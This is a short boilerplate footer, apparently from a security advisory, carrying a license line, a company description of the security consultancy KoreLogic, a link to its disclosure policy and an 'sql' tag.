License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Tag

#sql